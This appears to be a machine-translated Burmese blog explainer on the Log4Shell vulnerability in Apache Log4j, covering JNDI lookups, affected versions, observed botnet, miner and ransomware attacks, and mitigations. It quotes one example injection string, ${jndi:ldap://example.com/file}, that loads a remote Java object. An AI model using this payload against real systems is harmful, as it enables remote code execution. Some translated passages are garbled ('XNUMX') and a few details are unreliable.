မာတိကာ[ဖျောက်][ရှိုး]
2021 ခုနှစ် နိုဝင်ဘာလနှောင်းပိုင်းတွင်၊ ကျွန်ုပ်တို့သည် ဆိုက်ဘာလုံခြုံရေးအတွက် အဓိကခြိမ်းခြောက်မှုကို ဖော်ထုတ်တွေ့ရှိခဲ့သည်။ ဤအမြတ်ထုတ်မှုသည် ကမ္ဘာတစ်ဝှမ်းရှိ သန်းပေါင်းများစွာသော ကွန်ပျူတာစနစ်များကို ထိခိုက်စေနိုင်သည်။
ဤသည်မှာ Log4j အားနည်းချက်အတွက် လမ်းညွှန်ချက်ဖြစ်ပြီး ကမ္ဘာပေါ်ရှိ ကွန်ပျူတာဝန်ဆောင်မှုများ၏ 90% ကျော်ကို တိုက်ခိုက်ရန်ဖွင့်ထားသည့် ဒီဇိုင်းချို့ယွင်းချက် ချန်ထားပုံ။
Apache Log4j သည် Apache Software Foundation မှ ဖန်တီးထားသော open-source Java-based logging utility တစ်ခုဖြစ်သည်။ မူရင်း Ceki Gülcü မှ 2001 ခုနှစ်တွင် ရေးသားခဲ့သည်၊ ၎င်းသည် ယခုအခါ Apache Software Foundation ၏ ပရောဂျက်တစ်ခုဖြစ်သည့် Apache Logging Services ၏ တစ်စိတ်တစ်ပိုင်းဖြစ်သည်။
ကမ္ဘာတစ်ဝှမ်းရှိ ကုမ္ပဏီများသည် ၎င်းတို့၏ အက်ပ်လီကေးရှင်းများတွင် လော့ဂ်အင်လုပ်ရန် Log4j စာကြည့်တိုက်ကို အသုံးပြုကြသည်။ တကယ်တော့ Java စာကြည့်တိုက်သည် နေရာအနှံ့တွင်ရှိပြီး Amazon၊ Microsoft၊ Google နှင့် အခြားအရာများမှ အပလီကေးရှင်းများတွင် သင်ရှာတွေ့နိုင်ပါသည်။
စာကြည့်တိုက်၏ ထင်ရှားချက်မှာ ကုဒ်ရှိ ဖြစ်နိုင်ခြေရှိသော ချို့ယွင်းချက်မှန်သမျှသည် သန်းပေါင်းများစွာသော ကွန်ပျူတာများကို ဟက်ကင်းဖွင့်ထားနိုင်သည်ဟု ဆိုလိုသည်။ ၂၀၂၁ ခုနှစ် နိုဝင်ဘာလ ၂၄ ရက်၊ Cloud လုံခြုံရေး Alibaba မှာ အလုပ်လုပ်နေတဲ့ သုတေသီဟာ ကြောက်စရာကောင်းတဲ့ ချို့ယွင်းချက်တစ်ခုကို ရှာဖွေတွေ့ရှိခဲ့ပါတယ်။
Log4j ဟုလည်းသိကြသော Log4j အားနည်းချက်သည် 2013 ခုနှစ်မှ စတင်၍ သတိမပြုမိဘဲ တည်ရှိနေပါသည်။ အဆိုပါ အားနည်းချက်သည် Log4j လည်ပတ်သည့် သက်ရောက်မှုရှိသော စနစ်များတွင် ကုဒ်ကို အန္တရာယ်ပြုသော သရုပ်ဆောင်များအား လုပ်ဆောင်နိုင်စေပါသည်။ ဒီဇင်ဘာ ၉ ရက်၊ ၂၀၂၁ တွင် လူသိရှင်ကြား ထုတ်ဖော်ခဲ့သည်။
စက်မှုကျွမ်းကျင်သူများက Log4Shell ၏အားနည်းချက်ကိုခေါ်ဆိုသည်။ မကြာသေးမီက မှတ်ဉာဏ်တွင် အကြီးမားဆုံး အားနည်းချက်.
အားနည်းချက်ကို ထုတ်ပြန်ပြီးနောက် သီတင်းပတ်တွင် ဆိုက်ဘာလုံခြုံရေးအဖွဲ့များသည် သန်းနှင့်ချီသော တိုက်ခိုက်မှုများကို တွေ့ရှိခဲ့သည်။ အချို့သော သုတေသီများသည် တစ်မိနစ်လျှင် တိုက်ခိုက်မှု တစ်ရာကျော်နှုန်းကိုပင် လေ့လာတွေ့ရှိခဲ့သည်။
ဒါကဘယ်လိုမျိုးအလုပ်လုပ်သလဲ?
Log4Shell သည် အဘယ်ကြောင့် ဤမျှ အန္တရာယ်ကြီးသည်ကို နားလည်ရန်၊ ၎င်းသည် အဘယ်အရာ လုပ်ဆောင်နိုင်သည်ကို နားလည်ရန် လိုအပ်ပါသည်။
Log4Shell အားနည်းချက်သည် မထင်မှတ်ဘဲ ကုဒ်လုပ်ဆောင်မှုကို ခွင့်ပြုပေးသည်၊ ဆိုလိုသည်မှာ အခြေခံအားဖြင့် တိုက်ခိုက်သူသည် ပစ်မှတ်စက်ပေါ်တွင် မည်သည့်အမိန့် သို့မဟုတ် ကုဒ်ကိုမဆို လုပ်ဆောင်နိုင်သည်ဟု ဆိုလိုသည်။
ဒါကို ဘယ်လို ပြီးမြောက်စေသလဲ။
အရင်ဆုံး JNDI ဆိုတာ ဘာလဲဆိုတာ နားလည်ဖို့ လိုပါတယ်။
Java Naming and Directory Interface (JNDI) သည် Java ပရိုဂရမ်များကို အမည်တစ်ခုဖြင့် ဒေတာနှင့် အရင်းအမြစ်များကို ရှာဖွေနိုင်စေရန် ခွင့်ပြုပေးသော Java ဝန်ဆောင်မှုတစ်ခုဖြစ်သည်။ အပလီကေးရှင်းများဖန်တီးသောအခါတွင် အလွယ်တကူကိုးကားနိုင်ရန် developer များအတွက် စုစည်းထားသော မှတ်တမ်းအစုအဝေးကို ပေးဆောင်သောကြောင့် ဤလမ်းညွှန်ဝန်ဆောင်မှုများသည် အရေးကြီးပါသည်။
JNDI သည် အချို့သော လမ်းညွှန်တစ်ခုကို ဝင်ရောက်ရန် အမျိုးမျိုးသော ပရိုတိုကောများကို အသုံးပြုနိုင်သည်။ ဤပရိုတိုကောများထဲမှ တစ်ခုသည် Lightweight Directory Access Protocol သို့မဟုတ် LDAP ဖြစ်သည်။
ကြိုးတစ်ချောင်းကို မှတ်တမ်းတင်သည့်အခါ၊ log4j ဖောင်၏အသုံးအနှုန်းများနှင့် ကြုံတွေ့ရသောအခါတွင် စာကြောင်းအစားထိုးမှုများကို လုပ်ဆောင်သည်။ ${prefix:name}
.
ဥပမာ, Text: ${java:version}
စာသား- Java ဗားရှင်း 1.8.0_65 အဖြစ် မှတ်တမ်းဝင်နိုင်သည်။ ဒီလို အစားထိုးမှုမျိုးတွေက သာမာန်ပါပဲ။
အစရှိတဲ့ အသုံးအနှုန်းတွေလည်း ပါနိုင်ပါတယ်။ Text: ${jndi:ldap://example.com/file}
LDAP ပရိုတိုကောမှတဆင့် URL တစ်ခုမှ Java အရာတစ်ခုကို တင်ရန် JNDI စနစ်အား အသုံးပြုသည်။
၎င်းသည် ထို URL မှလာသော ဒေတာများကို စက်ထဲသို့ ထိထိရောက်ရောက် တင်ပေးသည်။ ဖြစ်နိုင်ချေရှိသော ဟက်ကာတိုင်းသည် အများသူငှာ URL တွင် အန္တရာယ်ရှိသောကုဒ်ကို လက်ခံဆောင်ရွက်ပေးနိုင်ပြီး Log4j ကို အသုံးပြုသည့် စက်များကို စောင့်ဆိုင်းနိုင်သည်။
မှတ်တမ်းမက်ဆေ့ဂျ်များ၏ အကြောင်းအရာများတွင် အသုံးပြုသူထိန်းချုပ်ထားသော ဒေတာပါ၀င်သောကြောင့် ဟက်ကာများသည် ၎င်းတို့ထိန်းချုပ်သည့် LDAP ဆာဗာများကို ညွှန်ပြသည့် ၎င်းတို့၏ကိုယ်ပိုင် JNDI ကိုးကားချက်များကို ထည့်သွင်းနိုင်သည်။ ဤ LDAP ဆာဗာများသည် JNDI သည် အားနည်းချက်မှတစ်ဆင့် လုပ်ဆောင်နိုင်သည့် အန္တရာယ်ရှိသော Java အရာဝတ္ထုများနှင့် ပြည့်နေနိုင်သည်။
ပိုဆိုးတာက အပလီကေးရှင်းက server-side ဒါမှမဟုတ် client-side application ဖြစ်မဖြစ် ကိစ္စမရှိပါဘူး။
လော့ဂ်ဂါသည် တိုက်ခိုက်သူ၏ အန္တရာယ်ရှိသောကုဒ်ကို ဖတ်ရန် နည်းလမ်းရှိသရွေ့၊ အပလီကေးရှင်းသည် ထုတ်ယူသုံးစွဲရန် ဖွင့်ထားဆဲဖြစ်သည်။
ဘယ်သူ့ကိုထိခိုက်သလဲ
အားနည်းချက်သည် APache Log4j ကိုအသုံးပြုသည့် ဗားရှင်း 2.0 မှ 2.14.1 အထိ နှင့် XNUMX အပါအဝင် ဗားရှင်းအားလုံးအပေါ် သက်ရောက်မှုရှိသည်။
အားနည်းချက်သည် Java ကိုအသုံးပြုသည့် application အများအပြားအပေါ် သက်ရောက်မှုရှိနိုင်သည်ဟု လုံခြုံရေးကျွမ်းကျင်သူအချို့က အကြံပေးသည်။
ချို့ယွင်းချက်ကို Microsoft ပိုင် Minecraft ဗီဒီယိုဂိမ်းတွင် ပထမဆုံးတွေ့ရှိခဲ့သည်။ Microsoft သည် ၎င်းတို့၏ သုံးစွဲသူများအား ၎င်းတို့၏ Java edition Minecraft ဆော့ဖ်ဝဲကို အဆင့်မြှင့်တင်ရန် တိုက်တွန်းထားသည်။
ဆိုက်ဘာလုံခြုံရေးနှင့် အခြေခံအဆောက်အဦလုံခြုံရေးအေဂျင်စီ (CISA) ၏ ဒါရိုက်တာ Jen Easterly က စျေးသည်များတွင် တစ်ခုရှိသည်ဟုဆိုသည်။ အဓိကတာဝန် အသုံးပြုသူများအနေဖြင့် ဤအားနည်းချက်ကို အသုံးချနေသည့် အန္တရာယ်ရှိသော သရုပ်ဆောင်များမှ တားဆီးရန်။
“ရောင်းချသူများသည် ၎င်းတို့၏ထုတ်ကုန်တွင် ဤအားနည်းချက်ပါရှိသည်ကို နောက်ဆုံးအသုံးပြုသူများ သိရှိစေရန်နှင့် ဆော့ဖ်ဝဲအပ်ဒိတ်များကို ဦးစားပေးလုပ်ဆောင်သင့်သည်ဟု ရောင်းချသူများသည် ၎င်းတို့၏ဖောက်သည်များနှင့်လည်း ဆက်သွယ်သင့်သည်။”
တိုက်ခိုက်မှုတွေ စတင်နေပြီလို့ သိရပါတယ်။ ဆိုက်ဘာလုံခြုံရေးဆော့ဖ်ဝဲကို ပံ့ပိုးပေးသည့် ကုမ္ပဏီတစ်ခုဖြစ်သည့် Symantec သည် အမျိုးမျိုးသော တိုက်ခိုက်မှုတောင်းဆိုမှုများကို စောင့်ကြည့်လေ့လာခဲ့သည်။
ဤသည်မှာ သုတေသီများတွေ့ရှိခဲ့သော တိုက်ခိုက်မှုအမျိုးအစားများ၏ နမူနာအချို့ဖြစ်သည်-
- botnet များ
Botnets သည် တိုက်ခိုက်ရေးပါတီတစ်ခုတည်း၏ ထိန်းချုပ်မှုအောက်တွင်ရှိသော ကွန်ပျူတာကွန်ရက်တစ်ခုဖြစ်သည်။ ၎င်းတို့သည် DDoS တိုက်ခိုက်မှုများကို လုပ်ဆောင်ရန်၊ ဒေတာခိုးယူခြင်းနှင့် အခြားသော လိမ်လည်လှည့်ဖြားမှုများကို လုပ်ဆောင်ရန် ကူညီပေးသည်။ သုတေသီများသည် Log4j exploit မှဒေါင်းလုဒ်လုပ်ထားသော shell scripts များတွင် Muhstik botnet ကိုလေ့လာတွေ့ရှိခဲ့သည်။
- XMRig Miner Trojan
XMRig သည် Monero တိုကင်ကိုတူးဖော်ရန် CPUs ကိုအသုံးပြုသည့် open-source cryptocurrency miner တစ်ခုဖြစ်သည်။ ဆိုက်ဘာရာဇ၀တ်ကောင်များသည် လူတို့၏စက်ပစ္စည်းများတွင် XMRig ကို ထည့်သွင်းနိုင်သောကြောင့် ၎င်းတို့သည် ၎င်းတို့၏လုပ်ဆောင်ခြင်းပါဝါကို ၎င်းတို့၏အသိပညာမရှိဘဲ အသုံးပြုနိုင်သည်။
- Khonsari Ransomware
Ransomware သည် ဖန်တီးထုတ်လုပ်ထားသော malware ပုံစံကို ရည်ညွှန်းသည်။ ဖိုင်များကို စာဝှက်ပါ။ ကွန်ပျူတာပေါ်တွင် ထို့နောက် တိုက်ခိုက်သူများသည် ကုဒ်ဝှက်ထားသောဖိုင်များကို ပြန်လည်ဝင်ရောက်ခွင့်ပေးရန်အတွက် အပြန်အလှန်အားဖြင့် ငွေပေးချေမှုကို တောင်းဆိုနိုင်သည်။ Log4Shell တိုက်ခိုက်မှုများတွင် သုတေသီများသည် Khonsari ransomware ကို ရှာဖွေတွေ့ရှိခဲ့သည်။ ၎င်းတို့သည် Windows ဆာဗာများကို ပစ်မှတ်ထားပြီး .NET မူဘောင်ကို အသုံးပြုသည်။
အဘယ်အရာကိုလာမယ့်ဖြစ်သွားမလဲ
Log4J အားနည်းချက်ကြောင့် ဖြစ်ပေါ်လာသော မငြိမ်မသက်မှုများကို အပြည့်အဝဖြေရှင်းရန် လများ သို့မဟုတ် နှစ်များပင် ကြာနိုင်သည်ဟု ကျွမ်းကျင်သူများက ခန့်မှန်းသည်။
ဤလုပ်ငန်းစဉ်တွင် ထိခိုက်မှုရှိသော စနစ်တိုင်းကို ဖာထေးသည့်ဗားရှင်းဖြင့် အပ်ဒိတ်လုပ်ခြင်း ပါဝင်သည်။ ဤစနစ်များအားလုံးကို ဖာထေးထားသော်လည်း၊ ဟက်ကာများသည် တိုက်ခိုက်ရန်အတွက် ဆာဗာများဖွင့်ထားသည့် window တွင် ဟက်ကာများထည့်သွင်းထားပြီးဖြစ်နိုင်သည့် နောက်ကွယ်မှခြိမ်းခြောက်မှုများရှိနေသေးသည်။
များသော ဖြေရှင်းနည်းများနှင့် လျော့ပါးသက်သာစေခြင်း။ အပလီကေးရှင်းများကို ဤ bug ဖြင့် အသုံးချခြင်းမှ ကာကွယ်ရန် တည်ရှိနေပါသည်။ Log4j ဗားရှင်းအသစ် 2.15.0-rc1 သည် ဤအားနည်းချက်ကို လျော့ပါးစေရန် ဆက်တင်အမျိုးမျိုးကို ပြောင်းလဲခဲ့သည်။
JNDI အသုံးပြုသည့် အင်္ဂါရပ်အားလုံးကို မူရင်းအတိုင်း ပိတ်မည်ဖြစ်ပြီး အဝေးမှ ရှာဖွေမှုများကိုလည်း ကန့်သတ်ထားသည်။ သင်၏ Log4j စနစ်ထည့်သွင်းမှုတွင် ရှာဖွေမှုအင်္ဂါရပ်ကို ပိတ်ထားခြင်းဖြင့် ဖြစ်နိုင်ခြေရှိသော အမြတ်ထုတ်မှုများ ဖြစ်နိုင်ခြေကို လျော့ကျစေပါသည်။
Log4j အပြင်ဘက်မှာ၊ open-source exploits တွေကို တားဆီးဖို့ ပိုမိုကျယ်ပြန့်တဲ့ အစီအစဉ်တစ်ခု လိုအပ်နေပါသေးတယ်။
မေလ အစောပိုင်းတွင် အိမ်ဖြူတော်က ထုတ်ပြန်ခဲ့သည်။ အလုပ်အမှုဆောင်အမိန့် အမျိုးသားဆိုက်ဘာလုံခြုံရေးကို မြှင့်တင်ရန် ရည်ရွယ်သည်။ ၎င်းတွင် အခြေခံအားဖြင့် အပလီကေးရှင်းတည်ဆောက်ရန် လိုအပ်သည့်အရာတိုင်း၏စာရင်းပါရှိသော တရားဝင်စာရွက်စာတမ်းတစ်ခုဖြစ်သည့် software bill of materials (SBOM) အတွက် ပြဋ္ဌာန်းချက်တစ်ခုပါ၀င်သည်။
ဤကဲ့သို့သော အစိတ်အပိုင်းများ ပါဝင်သည်။ open source ဖြစ်ပြီး ပက်ကေ့ဂျ်များ၊ မှီခိုမှုနှင့် API များကို ဖွံ့ဖြိုးတိုးတက်မှုအတွက် အသုံးပြုသည်။ SBOM ၏ အယူအဆသည် ပွင့်လင်းမြင်သာမှုအတွက် အထောက်အကူဖြစ်စေသော်လည်း၊ ၎င်းသည် စားသုံးသူကို အမှန်တကယ် အထောက်အကူဖြစ်စေမည်လား။
မှီခိုမှုကို အဆင့်မြှင့်တင်ခြင်းသည် ခက်ခဲလွန်းလှသည်။ ကုမ္ပဏီများသည် အခြားရွေးချယ်စရာပက်ကေ့ဂျ်များကို ရှာဖွေရာတွင် အချိန်ပိုဖြုန်းမည့်အစား ဒဏ်ကြေးငွေပေးဆောင်ရန် ရွေးချယ်နိုင်သည်။ ဤ SBOM များသည် ၎င်းတို့အတွက်သာ အသုံးဝင်မည် ဖြစ်ကောင်းဖြစ်နိုင်သည်။ နယ်ပယ် ကန့်သတ်ထားသည်
ကောက်ချက်
Log4j ပြဿနာသည် အဖွဲ့အစည်းများအတွက် နည်းပညာဆိုင်ရာ ပြဿနာတစ်ခုမျှသာဖြစ်သည်။
လုပ်ငန်းခေါင်းဆောင်များသည် ၎င်းတို့၏ ဆာဗာများ၊ ထုတ်ကုန်များ သို့မဟုတ် ဝန်ဆောင်မှုများသည် ၎င်းတို့ကိုယ်တိုင် မထိန်းသိမ်းနိုင်သော ကုဒ်ကို အားကိုးသည့်အခါ ဖြစ်ပေါ်လာနိုင်သည့် အလားအလာများကို သတိပြုရမည်ဖြစ်သည်။
open-source နှင့် third-party applications များကို အားကိုးခြင်းသည် အမြဲတမ်း အန္တရာယ်အချို့နှင့် လာပါသည်။ ကုမ္ပဏီများသည် ခြိမ်းခြောက်မှုအသစ်များ မပေါ်မီတွင် အန္တရာယ်လျော့ပါးရေး မဟာဗျူဟာများကို လုပ်ဆောင်ရန် စဉ်းစားသင့်သည်။
ဝဘ်အများစုသည် ကမ္ဘာတစ်ဝှမ်းရှိ စေတနာ့ဝန်ထမ်းထောင်ပေါင်းများစွာမှ ထိန်းသိမ်းထားသော open-source software ပေါ်တွင် မှီခိုနေရပါသည်။
ဝဘ်အား လုံခြုံသောနေရာတစ်ခုအဖြစ် ထားရှိလိုပါက၊ အစိုးရများနှင့် ကော်ပိုရေးရှင်းများက ရန်ပုံငွေထောက်ပံ့မှုများနှင့် ဆိုက်ဘာလုံခြုံရေးအေဂျင်စီများကဲ့သို့သော ပွင့်လင်းမြင်သာမှုဆိုင်ရာ ကြိုးပမ်းမှုများတွင် ရင်းနှီးမြှုပ်နှံသင့်သည်။ CISA.
တစ်ဦးစာပြန်ရန် Leave